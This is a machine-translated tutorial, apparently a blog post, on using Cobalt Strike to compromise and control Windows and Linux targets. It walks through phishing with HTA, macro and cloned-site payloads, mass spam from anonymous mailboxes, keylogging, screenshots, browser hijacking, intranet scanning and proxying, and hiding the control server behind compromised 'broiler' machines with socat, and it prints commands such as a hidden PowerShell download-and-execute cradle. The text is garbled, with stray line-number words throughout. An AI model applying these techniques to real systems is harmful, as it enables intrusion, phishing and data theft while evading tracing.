0x01 about cobalt strike

One

Two

Three

A very excellent post penetration platform The only reason why it's not easy to use may be that many usages haven't been dug out by ourselves, because they can't be used, so they feel bad to use]

The tool is based on Java, and most of its functions are relatively practical on the basis of improvement, which is very suitable for cooperative combat among teams

For more details, please refer to the official website. There is no more verbosity here. All of the following abbreviations are 'CS'

0x02 basic environment introduction:

One

Two

Three

Four

Five

Kali actual control terminal IP: 192.168.1.144

Ubuntu 16.04 VPS IP of its own public network: 53.3.3.6

Win2008r2 target machine IP: 192.168.1.191

CentOS 6.9 controlled broiler IP: 192.168.1.199

Win7cn another broiler IP: 192.168.1.123

0x03 let's quickly preview some basic modules of CS for specific purposes:

Team server

One

Two

Three

Four

It is mainly for the convenience of sharing all penetration information of all members in a penetration team in time, strengthening the communication and cooperation among members, so as to improve the penetration efficiency

In other words, under normal circumstances, a team only needs to set up a team server, and all members of the team only need to log in to the team server with their own CS client to easily achieve cooperative operations

Of course, in practice, in order to maintain the permissions of the target machine as long as possible, we will habitually open several more team servers to prevent unexpected situations

In addition, the community server is better to run on the Linux platform [the team server system used in this demonstration is Ubuntu 16.04]

One

Two

#. / teamserver team server ip set a team server password [others need to use this password to connect in] configuration file [generally default] [yyyy-mm-dd]

# ./teamserver 53.3.3.6 klion

In order to better illustrate the effect, here we simulate two different clients to log in to the same team server at the same time. First, run the client on the local machine and try to log in to the team server. After the client starts, you will be prompted to enter the IP, port and password of the team server. The user name can be at will

One

# ./cobaltstrike

Then, open the client on another Kali machine and log in to the same team server. The final effect is as follows. Team members can communicate with each other through event, or clearly see what other members of the team have done at any time through event, which is very detailed and intuitive:

One

# ./cobaltstrike

Various monitors using CS

One

Two

In fact, the function of the monitor is very simple. It is mainly to accept all kinds of data returned by payload,

For example, after the target machine executes, our payload will connect back to the listener and download and execute the real shellcode code, which is basically consistent with the function of the handler in MSF

There are two kinds of listeners in CS, one is beacon, the other is foreign

One

Two

Beacon is a built-in monitor for CS. That is to say, when we successfully execute payload in the target system, we will bounce back a shell of beacon to CS. The communication protocols supported by the shell mainly include these kinds of, DNS, HTTPS, HTTP, SMB [pipe]. In addition, there are many built-in functions of the shell of beacon, which we will talk about in detail later

Foreign is mainly used to provide some external listeners. For example, if you want to use CS to derive a metapreter shell back to continue the internal network penetration, you choose to use the external listener

Let's briefly demonstrate how to quickly create a listener. The specific process is as follows

One

Two

Three

Four

Click on the cobalt strike menu in the upper left corner

->Check listeners

->Then click the Add button and the listener configuration box will pop up automatically

->Set the port IP [in fact, it is better to use the domain name (DNS tunnel)] and the payload type to create it. After that, the team server will always listen to the data waiting for the connection of the beacon shell

With the monitor, finally, let's talk about payload

One

Two

In fact, baidianer is a Trojan downloader. When the target triggers the payload, it will automatically download the shellcode [which is actually the code of the beacon shell] to the target system to run, and finally successfully bounce back to the beacon shell of the target system,

As for the instructions executed in the beacon shell, they are all executed according to the planned tasks, that is to say, the controlled end will automatically download various instructions to the control end according to the predetermined time and execute them in the target system in turn

First of all, let's simply create a payload, and then directly throw it into the target system for execution. Let's see what the actual online effect looks like. Note that those with red claws have obtained the highest authority of the system, while those without claws are basically the ones with lower authority temporarily

0x04 rich client attack options. First of all, try to use the 'System Profiler' module to collect all kinds of machine information of the target, such as what version of the operating system the target uses, what browser, what is the detailed version, whether flash is installed or not, and what is the specific version of flash [the lower version can hang horses], to see if you can see the target intranet IP segment, It's estimated by visual inspection how big the target intranet is. With these basic information, we can write and send letters in the later stage. In fact, it's better to use domain name, because this is the IP directly used for experiments. When sending letters, it's better to use HTML to disguise a "in place" link. As for letter writing and sending, it's another "professional" technical point, with limited personal ability, It's not involved here, hehe Let's have a brief look at the actual effect

Use the 'HTA payload' with the 'file download' module to send various phishing links to the target. First, create an HTA payload. The payload here only supports three executable formats temporarily, EXE, PowerShell and VBA (macro). In practice, PowerShell is more recommended. The success rate is relatively high, and the benefits are not much. It's free of killing and flexible

One

http://53.3.3.6:80/download/plugins.hta

Generate shellcode based on various languages, such as C, C, Java, python, PowerShell, ruby, raw. In addition, CS also provides options that can be used directly with veil. Here, take the most practical PowerShell as an example. After generating, try to load the script into the target system. Here, load it directly in the target CMD, In practice, you can separate this code and put it anywhere you can execute PS

One

# powershell –exec bypass –Command "& {Import-Module 'C:\payload.ps1'}"

Try to use office macro to fish. It is not recommended to do this directly, because office does not use macro by default. However, you can try to use some relatively new office 0days that have burst out. Pay attention to that you must disable the macro without digital visa when using office. Do not trust VBA

Try to embed the payload into the normal exe. However, the icon of exe may be changed after bundling. You can try to button the original putty.exe icon, and then replace it, and deal with it well. After that, the problem is not too big. As can be seen clearly from the figure below, when the normal program is executed, Our payload has also been executed [in fact, payload is executed first]

To generate a traditional USB self running payload, you need to provide a payload [this can be generated directly with CS, but it is not necessary to kill, it is better to do it with the Malay you have handled] that is to say, for the system before XP, the system after win7 is basically useless, and the usability is not very good, so we won't go into details here

As for generating a regular exe payload, it's very simple. Specify which listener you want to hang to, then save a name with a high hit rate, and put the generated executable file on the target machine to execute. It's very simple, and there's not much verbosity here

Clone the targeted website, provide a website that you want to clone, match your own URL [imitate as much as possible as the target], and then bring the payload you want to execute. The payload here can be generated directly with MSF or HTA as I do. Of course, in reality, the payload must be carefully handled, and the opportunity will not come easily, and it will not be fooled, In fact, it's better to use HTML to make the URL more realistic

"PowerShell web delivery" may also be the most commonly used functional module. In fact, it is equivalent to the web delivery module in MSF. It will generate a piece of shellcode code, and then provide you with a downloader, so that you can plug this downloader into any place that can run PowerShell and access to the Internet normally. For example, typical CHM, shortcut , because it's just an experiment, I just threw it into the CMD of the target system to execute

To send spam, first put all the target mailboxes in a file [note, each line corresponds to one], then find an email ready to be used for fishing [directly check the original text, paste the whole HTML out], after writing the letter, remember to preview it first to see the actual effect, and then configure the public email server used to send the email. Here, I originally wanted to send it with the protocol email server, Later, I saw that the official said that the normal IMAP, POP3 and SMTP are not supported temporarily because of encryption. But I won't demonstrate it here. It's very simple. You can send me private if you don't understand it In addition, in practice, you'd better use all kinds of anonymous e-mails you have in hand to send [anyway, as long as you don't disclose private information, you can easily track it to the e-mails you have], which is very important Remember, the picture seems to be pasted wrong, Khan You know what I mean

Regular Java attacks have version restrictions, and they need to buy certificates. In actual penetration, in fact, the previous ones are basically enough, so we won't focus on them here

0x05 through the above methods, I believe you have got a beacon shell at this time. Let's explain in detail about the basic use of the beacon shell itself [post penetration stage]. First, let's assume that we have a beacon shell that has not passed the administrator's permission before UAC, so as to carry out the following basic operations, It needs to be explained in advance that CS does not support Chinese well. If the target is a Chinese system, it is certain that there is garbled code

One

Two

Three

Four

Five

Six

Seven

Eight

Nine

Ten

Eleven

Twelve

Thirteen

Fourteen

Fifteen

Sixteen

Seventeen

Eighteen

Nineteen

Twenty

Twenty-one

Twenty-two

Help view all the built-in command help of the beacon shell. If you want to view the usage of the specified command, you can do this, eg: help checkin

Note name the current directory machine, eg: Note beacon shell

CD to switch directories in the target system, note that to switch directories in the win system, use double backslashes, or use '/' eg: CD C:\\

MKDIR new directory, eg: MKDIR D: \ \ beacon

RM delete file or directory, eg: RM D: \ \ beacon

Upload upload files to the target system

Download to download the specified file from the target system, eg: Download C: \ \ users \ \ win7cn \ \ desktop \ \ putty.exe

Cancel cancels the download task. For example, if a file is very large, the download may be very time-consuming. If you don't want to continue in the middle of the process, you can use this to cancel it

Shell executes the specified CMD command in the target system, eg: shell whoamI

Getuid: to view the user permissions of the current beacon session in the target system, you may need to bypass UAC or raise permissions

PWD view the current path in the directory system

Ls lists all files and directories in the current directory

Drives lists all partitions of the target system [called drive letters in win]

PS view the current list of all processes in the target system

Kill the specified process, eg: kill 4653

Sleep 10 specifies the sleep time of the controlled terminal. It defaults to 60 seconds for a return, and lets the controlled terminal download tasks every 10 seconds. In practice, the frequency should not be too fast, and it is easy to be found. About 80 seconds is enough

Jobs lists all task lists. Some tasks may take a little longer to execute. At this time, you can see the corresponding specific task ID from the task list and clear it specifically

Jobkill if you find that the task has not been executed or abnormal for a long time, you can use this command to directly end the task. Eg: jobkill 1345

Clear clears the task queue inside the beacon

Checkin forces the controlled end to connect once

Exit terminate the current beacon session

CTRL + K clear screen

0x06 collect all kinds of information on the target machine [some may trigger sensitive API to cause protection alarm, in addition to process injection, the controlled end may feel very obvious stuck, and the tool has many imperfections]:

One

Place regular keyboard records in the target system, eg: Keylogger 1796 x86

One

Try to capture the screen in the target system, which may cause the target system to have obvious jamming, eg: screenshot 1796 x86 10 capture 10 seconds

One

Two

Three

Four

Using web agent, hijack and forward the process data of the target browser to the specified port, and then we access from the port, which is equivalent to the data access in the target browser

For example, we can find that he logs in to a site that needs an account password through the screenshot, and I can log in directly to the site that he logs in without password through the browser agent. I have poor expression ability, and I believe that everyone should understand me

Officials say that IE is too laggy and unstable, and the success rate is half and half. It is estimated that the data of dump process are the reason. Dump may cause the target browser card in a flash.

But I have to say that this idea is still very good. It's just that what the function is currently doing [here worship the author, capital praise], which is not very perfect. You can try it if you have no way

One

Two

browserpivot 1460 x86

browserpivot stop

In fact, if it is really intra domain penetration, we can not do this for the time being, and we will talk about it separately later

One

Two

Three

Kerberos? Ccache? Use import ticket from ccache file

Kerberos? Ticket? Purge clears the ticket of the current shell

Kerberos? Ticket? Use import ticket from ticket file

0x07 enhance the practicability of CS through various PowerShell penetration frameworks, such as nishing, Empire, PowerPoint, powerup, Sherlock Continue, raise weight, bypass UAC, DLL injection, grasp hash, PTH They are as like as two peas. The core is in those scripts. Please pay attention to blog related articles on the specific usage of PowerShell frameworks. Here is not a single demonstration, simply say usage. Of course, beacon shell itself also provides similar functions, but I did not say, but in fact, that may not be enough, and its own tool work is not very good. Therefore, it is recommended that you use PowerShell to do the first way as much as possible, especially in the win intranet penetration, and import external PS script into the remote machine in the beacon shell

One

Two

powershell-import /root/Desktop/Get-Information.ps1

powershell Get-Information

The second way is to execute the PowerShell code directly in the beacon shell

One

powerpick Get-Host

0x08 use CS to flexibly penetrate the target Intranet

Carry out regular port scanning on the intranet where the target machine is located, specify the IP segment, specify the protocol used for scanning [only support ARP, ICMP, TCP temporarily], specify the thread [remember not to open too high in practice]

One

portscan 192.168.1.0/24 1-6000 arp 10

The built-in port forwarding function of the becon shell transfers a port of this machine to a port of a specified machine on the public network or the intranet, which is really slow in actual use and often breaks Reason unknown

One

Two

rportfwd 389 192.168.1.181 3389

rportfwd stop 389

Let CS and MSF interact with each other to open socks4a agent on the target machine for further intranet penetration

First, use various socks proxy clients to directly bring various penetration tools into the target Intranet

One

beacon> socks 1234

One

Two

Three

# vi /etc/proxychains.conf

socks4 53.3.3.6 1234

Socks stop

Second, the whole MSF is directly brought into the target intranet through the tunnel

One

setg Proxies socks4:53.3.3.6:1234

Connecting the Linux machine in the intranet with the beacon shell

One

ssh 192.168.1.199:22 root admin

The process is very simple. First, port forwarding is done on the community server, and then an external listener is created. The port and IP address write the IP address of the machine of the beacon shell, and then 'spawn' in the corresponding beacon shell selects the newly created external listener, There are still some problems that haven't been solved very well for the time being. I'll talk about them separately later

As for how to use MSF to bounce back a beacon shell, there are many ways. The easiest way is to directly execute the code of beacon's payload, and forget to map, sweat Make up later

0x09 cooperate with regular port forwarding to hide your team server as much as possible

One

Two

Three

Sometimes, in order to confuse the public and prevent others from quickly tracing to the source, we may add some springboards in the middle to hide our real team server location as much as possible. How to do this is actually very simple

White point is to do port forwarding [aka redirection], of course, this port forwarding must be done on its own existing broiler [on the importance of anonymity]

If you are not sure, you can also try to do multi-level forwarding on multiple broilers at the same time [that is, add more layers of springboard], so as to confuse the other party and increase the difficulty of tracing the source of the opponent. This is one of them

One

Two

Three

Four

There are also some machines in the target intranet that can't be connected to the public network directly. They can only access each other's intranet machines, but we still want to enable the machines that can't be connected to the Internet to be online normally

This is going to use the port forwarding we are going to talk about. As for the specific tools, there are a lot of them. However, it is recommended that you first choose some of the system's own tools, such as Netsh, iptables, socat

So, Hello, I'm fine^_^

As like as two peas, we'll use socat to demonstrate how to hide our team servers as far as possible. The same is true about the broken network of internal network.

First of all, log in to our team server with CS client in Kali, and create a normal 80 port listener. The back connection IP here temporarily uses the real IP where VPS is located [in practice, try to use domain name, which is very important], as follows

Then, you can SSH to the broiler and start forwarding with socat. The following sentence means to transfer the traffic from the external port 80 to the public network port 80 of VPS. After that, the local port 80 of the broiler will be in the monitoring state all the time. As soon as the traffic passes through port 80, it will be automatically forwarded to port 80 of VPS, and the port 80 of VPS is exactly our listener port, Believe you understand

One

# socat tcp-listen:80,reuseaddr,fork tcp:53.3.3.6:80 &

At this time, go back to the CS client and create a PowerShell payload. Note that as we said earlier, this is just a PowerShell Downloader, which is mainly responsible for downloading the real shellcode code. Remember to change the following IP address to the IP address of the broiler [because I'm a simulated broiler here, it's an intranet IP address. In fact, it must be a public IP address or domain name], Because our ultimate goal is to help us forward to our real team server through chicken, so as to achieve the purpose of hiding as much as possible

Note here that after the default generation, it is the domain name resolved by our own team server. In fact, we must manually change it to the chicken domain name or IP. In this way, when downloading and accessing, we will visit the chicken first, and we have already forwarded it in the chicken, so finally, our team server will download the shellcode code successfully. I'm a waste, I didn't even play all the yards. Anyway, VPS is about to expire. I'm used to guerrilla fighting. Haha C

One

# powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http:

Finally, we see as like as two peas. The goal is on the line. As for how to make the machine that can not be connected to the target in the target network be able to go on line, it is exactly the same. You can bomb the payload connection back to any machine that can normally surf the Internet, then go to the machine and transfer the incoming traffic to our team server. In this way, the machines that cannot be connected to the Internet in the Intranet can also be connected to the Internet normally

0x10 in depth understanding of DNS tunnel communication and SMB beacon communication process, which may be one of the core parts of the whole tool, will be discussed separately in a large amount of space in the future

0X11 as for Niubi's report generation function, let's not talk about it. It supports one click export of PDF. All the operation record data in the actual penetration process are saved in the specified directory. You can study it by yourself if you are interested. It's relatively simple. After all, it's not our focus here, so we won't go into details

A little summary: as you can see, the tool itself is very easy to use, pure graphical operation, a little basic, and can be started very quickly. Moreover, it directly supports flexible drag and drop of icons, which is very convenient for centralized batch operation of designated broilers, and very friendly. In fact, the combination of MSF and CS is used for intranet penetration, which is undoubtedly excellent for the time being, The real difficulty lies in the understanding of the communication process of the beacon shell of different protocols, which is also the most valuable part of the whole tool. To be honest, many problems about the internal communication details still bother me. I always think CS itself is a very beautiful learning sample. There are too many things worth digging into and settling in it, but there are many things, It's not for one person to finish it. I believe that everyone is the same as me. They will not be satisfied with the basic use of tools. In fact, they all know that there will be no substantial progress in that way. There is not much time and waste, so they are very looking forward to having in-depth exchanges with you By the way, CS 3.8 has been out for some time. If you want to taste it, you can try it. It's the old way to extend the trial period